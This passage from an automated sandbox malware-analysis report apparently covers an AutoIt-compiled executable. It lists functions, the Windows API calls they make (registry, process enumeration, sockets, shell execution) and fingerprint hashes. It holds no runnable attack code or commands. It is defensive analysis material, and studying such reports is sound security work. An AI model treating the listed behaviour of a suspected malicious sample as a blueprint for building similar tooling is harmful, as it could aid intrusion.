                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3300667738-0
                                                                                                                                                                                                                                                            • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                                                                                                                                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                                                                                                                                                            Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                                                                                                            • API String ID: 1586453840-614718249
                                                                                                                                                                                                                                                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                                                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                                                                                                                                                            Function 00433EE0 Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00433EFD
                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00433F63
                                                                                                                                                                                                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00433F76
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00433F86
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2547909840-0
                                                                                                                                                                                                                                                            • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                                                                                                                                                                                                                                            • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                                                                                                                                                                                                                                            Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                                                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                                                                                                                                                            Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                            • API String ID: 2487901850-572801152
                                                                                                                                                                                                                                                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                                                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                                                                                                                            Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 0040F2B5
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                            • API String ID: 1607946009-824357125
                                                                                                                                                                                                                                                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                                                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                                                                                                                                            Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 00465446
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 245547762-0
                                                                                                                                                                                                                                                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                                                                                                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                                                                                                                                                            Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                            • API String ID: 2417854910-1426351568
                                                                                                                                                                                                                                                            • Opcode ID: 514557f22d0f6e93a977befcff9d0e90bbfb1ee23c4dfd548d9af5fe2b3cdb46
                                                                                                                                                                                                                                                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 514557f22d0f6e93a977befcff9d0e90bbfb1ee23c4dfd548d9af5fe2b3cdb46
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                                                                                                                                                            Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                                                                                                                                            • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                                                                                                                                                                            Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2782032738-0
                                                                                                                                                                                                                                                            • Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                                                                                                                                                                                                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                                                                                                                                                            Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?,00000000,?,?), ref: 0046D42D
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 0046D475
                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2502553879-0
                                                                                                                                                                                                                                                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
